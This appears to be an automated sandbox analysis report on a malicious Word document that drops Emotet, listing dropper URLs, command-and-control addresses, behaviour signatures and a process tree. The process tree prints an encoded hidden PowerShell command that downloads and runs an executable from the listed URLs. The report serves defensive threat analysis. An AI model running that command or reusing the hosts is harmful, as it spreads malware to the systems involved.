Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    16-12-2019 11:16

General

  • Target

    5f2fa8f31561486dd05cc43c19240d180891d098fe1891d8df3606b544feabea.doc

  • Sample

    191216-gvbvha862j

  • SHA256

    5f2fa8f31561486dd05cc43c19240d180891d098fe1891d8df3606b544feabea

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://toivn.com/wp-admin/583483/

exe.dropper

http://talkmeupdev.us-west-2.elasticbeanstalk.com/wp-admin/network/k96246/

exe.dropper

https://thienvuongphat.com/thp/iy99/

exe.dropper

http://campsparrowhawk.se/wp-admin/j3q81823/

exe.dropper

http://doisongvaconnguoi.com/war1wqcr/narqdcn7/

Extracted

Family

emotet

C2

152.170.108.99:443

99.252.27.6:80

93.148.252.90:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

80.85.87.122:8080

2.139.158.136:443

80.11.158.65:8080

79.31.85.103:80

77.55.211.77:8080

96.61.113.203:80

181.198.203.45:443

142.93.114.137:8080

186.15.83.52:8080

181.36.42.205:443

68.183.190.199:8080

159.203.204.126:8080

50.28.51.143:8080

46.101.212.195:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f2fa8f31561486dd05cc43c19240d180891d098fe1891d8df3606b544feabea.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: AddClipboardFormatListener
    PID:4936
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4400
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4504
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABFAHUAYQB6AGMAcgBvAHYAeABvAHMAPQAnAFgAaABtAGwAegBiAGIAdQB3AGoAegBjAGoAJwA7ACQAQQBwAHoAegBzAG4AeQBrAHcAcAB3AGwAIAA9ACAAJwA1ADQAOQAnADsAJABDAGMAawBjAHQAcQB5AHAAegBsAGIAPQAnAFMAawBoAGcAcQBhAGMAawBkACcAOwAkAE0AYwBsAHMAeQB2AHoAagB1AHQAcQB6AG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAcAB6AHoAcwBuAHkAawB3AHAAdwBsACsAJwAuAGUAeABlACcAOwAkAFcAdgBoAGwAYQB4AHMAZAB3AGcAPQAnAEkAagBkAGgAaQB3AG0AbwBhAHcAJwA7ACQASgBnAHMAbABxAGQAegB1AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAEMAbABJAGUAbgB0ADsAJABSAGcAcABuAG8AbABnAHMAPQAnAGgAdAB0AHAAcwA6AC8ALwB0AG8AaQB2AG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADUAOAAzADQAOAAzAC8AKgBoAHQAdABwADoALwAvAHQAYQBsAGsAbQBlAHUAcABkAGUAdgAuAHUAcwAtAHcAZQBzAHQALQAyAC4AZQBsAGEAcwB0AGkAYwBiAGUAYQBuAHMAdABhAGwAawAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgBlAHQAdwBvAHIAawAvAGsAOQA2ADIANAA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGkAZQBuAHYAdQBvAG4AZwBwAGgAYQB0AC4AYwBvAG0ALwB0AGgAcAAvAGkAeQA5ADkALwAqAGgAdAB0AHAAOgAvAC8AYwBhAG0AcABzAHAAYQByAHIAbwB3AGgAYQB3AGsALgBzAGUALwB3AHAALQBhAGQAbQBpAG4ALwBqADMAcQA4ADEAOAAyADMALwAqAGgAdAB0AHAAOgAvAC8AZABvAGkAcwBvAG4AZwB2AGEAYwBvAG4AbgBnAHUAbwBpAC4AYwBvAG0ALwB3AGEAcgAxAHcAcQBjAHIALwBuAGEAcgBxAGQAYwBuADcALwAnAC4AIgBzAHAATABgAGkAVAAiACgAJwAqACcAKQA7ACQAWQBzAHYAdABuAHAAZQB6AD0AJwBGAHgAaQBuAHAAYwBzAHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEwAbQB2AHUAdQBtAGkAegAgAGkAbgAgACQAUgBnAHAAbgBvAGwAZwBzACkAewB0AHIAeQB7ACQASgBnAHMAbABxAGQAegB1AC4AIgBkAGAATwBXAG4ATABgAG8AYQBkAGYAYABpAEwARQAiACgAJABMAG0AdgB1AHUAbQBpAHoALAAgACQATQBjAGwAcwB5AHYAegBqAHUAdABxAHoAbgApADsAJABYAHkAeQB4AG0AdAB1AG4AcgBpAGoAYQBnAD0AJwBJAGIAegBwAGcAYgB2AGcAZwBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATQBjAGwAcwB5AHYAegBqAHUAdABxAHoAbgApAC4AIgBsAGUAbgBnAGAAVABoACIAIAAtAGcAZQAgADIANAA1ADUANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABNAGMAbABzAHkAdgB6AGoAdQB0AHEAegBuACkAOwAkAEgAagB3AGIAbgBwAGcAegB0AHkAZwB1AD0AJwBJAHgAcwBmAHEAZQBhAGgAYQB0AGkAJwA7AGIAcgBlAGEAawA7ACQAQwBzAHIAdABnAHQAeQBnAGgAbQBoAG0AcQA9ACcATwBkAHMAdgBsAGsAbgBqAG8AeABwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAaQBjAHMAbABzAGQAaABiAGUAYQBhAD0AJwBBAGsAawB0AHoAaABuAHQAeABiACcA
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      PID:4644
      • C:\Users\Admin\549.exe
        "C:\Users\Admin\549.exe"
        2⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4364
        • C:\Users\Admin\549.exe
          --33dd418
          3⤵
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:4332

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4332-12-0x0000000002100000-0x0000000002117000-memory.dmp

      Filesize

      92KB

    • memory/4332-13-0x0000000000400000-0x000000000047D000-memory.dmp

      Filesize

      500KB

    • memory/4364-10-0x0000000000630000-0x0000000000647000-memory.dmp

      Filesize

      92KB

    • memory/4936-2-0x0000014998BBD000-0x0000014998BC0000-memory.dmp

      Filesize

      12KB